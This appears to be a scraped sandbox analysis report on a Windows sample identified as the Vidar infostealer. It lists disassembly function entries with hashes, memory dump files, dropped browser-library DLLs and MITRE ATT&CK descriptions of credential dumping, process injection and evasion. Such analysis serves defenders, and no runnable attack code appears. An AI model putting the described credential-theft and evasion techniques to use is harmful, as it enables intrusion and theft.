Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: a3a8065e4e44e10eb34f3d99aceb410d00d069beed3c3854a2a2fc5ae21d0218
Instruction ID: 13b9c55890f56effaa0839f190beedd3ff31ccb6f3ca40dc85d0d5cc91a71fbf
Opcode Fuzzy Hash: a3a8065e4e44e10eb34f3d99aceb410d00d069beed3c3854a2a2fc5ae21d0218
Instruction Fuzzy Hash: 821130B66083408BD704DF25D45175FB7E5AFD8214F88882EE48A87290EB75E548CB97

Uniqueness

Uniqueness Score: -1.00%

Function 19C7EFE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

SELECT %s WHERE rowid = ?, xrefs: 19C7F017

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT %s WHERE rowid = ?
API String ID: 0-866778640
Opcode ID: 33d2cdfdad467dedf17d1198d85f3f2a52cf593c8178cfd1f5618689cbda9c24
Instruction ID: 517c971622c8e6fd4cf91c0f99f12a683658bc5071c68bb7b3d4c33c3c5403fb
Opcode Fuzzy Hash: 33d2cdfdad467dedf17d1198d85f3f2a52cf593c8178cfd1f5618689cbda9c24
Instruction Fuzzy Hash: F711883220034A9BD7208F9AFC80F96F794EF40331F14852EF19A96680EB73B4518BB0

Uniqueness

Uniqueness Score: -1.00%

Function 19C57200 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

Strings

invalid, xrefs: 19C5721B
API call with %s database connection pointer, xrefs: 19C57220

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$invalid
API String ID: 0-3574585026
Opcode ID: 6729362ade0d8a3932266322c87873fda45f6f82a6320d6b06a1b079f31258e8
Instruction ID: 0b2dbbd5c42d0ec55504567d564165c7a0eb6ccfca8b6cb3c428752ce5bd6f74
Opcode Fuzzy Hash: 6729362ade0d8a3932266322c87873fda45f6f82a6320d6b06a1b079f31258e8
Instruction Fuzzy Hash: 1BF0F672F0A610CBEA105638FC14B9777DA6F40721F4C4555F5D7D23D2C221E4D4C295

Uniqueness

Uniqueness Score: -1.00%

Function 19C2B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C2B238
misuse, xrefs: 19C2B233

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$misuse
API String ID: 0-2530468415
Opcode ID: fb977248aa9d149978e88f582caf9ee80f3470cff2c91b741f353a00de3bb530
Instruction ID: 2716c869d46e5f3feaaafbcd41c0c720275571b557c5b8546e2b6e5872ff5361
Opcode Fuzzy Hash: fb977248aa9d149978e88f582caf9ee80f3470cff2c91b741f353a00de3bb530
Instruction Fuzzy Hash: 9CC02221104308E3C700DA54FC01CC96B304FD0A01F988034E2684A4829220801C4282

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAAEHDBF

C:\ProgramData\BFIDGHDB

C:\ProgramData\DBFIEHDHIIIECAAKECFHIECBKJ

C:\ProgramData\ECBAEBGH

C:\ProgramData\ECGDBAEH

C:\ProgramData\GDHDAEBGCAAFIDGCGDHI

C:\ProgramData\HDGCFHIDAKEC\freebl3.dll

C:\ProgramData\HDGCFHIDAKEC\mozglue.dll

C:\ProgramData\HDGCFHIDAKEC\msvcp140.dll

C:\ProgramData\HDGCFHIDAKEC\nss3.dll

C:\ProgramData\HDGCFHIDAKEC\softokn3.dll

C:\ProgramData\HDGCFHIDAKEC\vcruntime140.dll

Windows Analysis Report
file.exe

Function 009E59BC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 009E69BB Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Function 009F3416 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
memoryCOMMON

Function 009E0E13 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 009E8126 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Function 009EA0BA Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 009D57BD Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Function 009E7D28 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 009E56AA Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 009E5E56 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre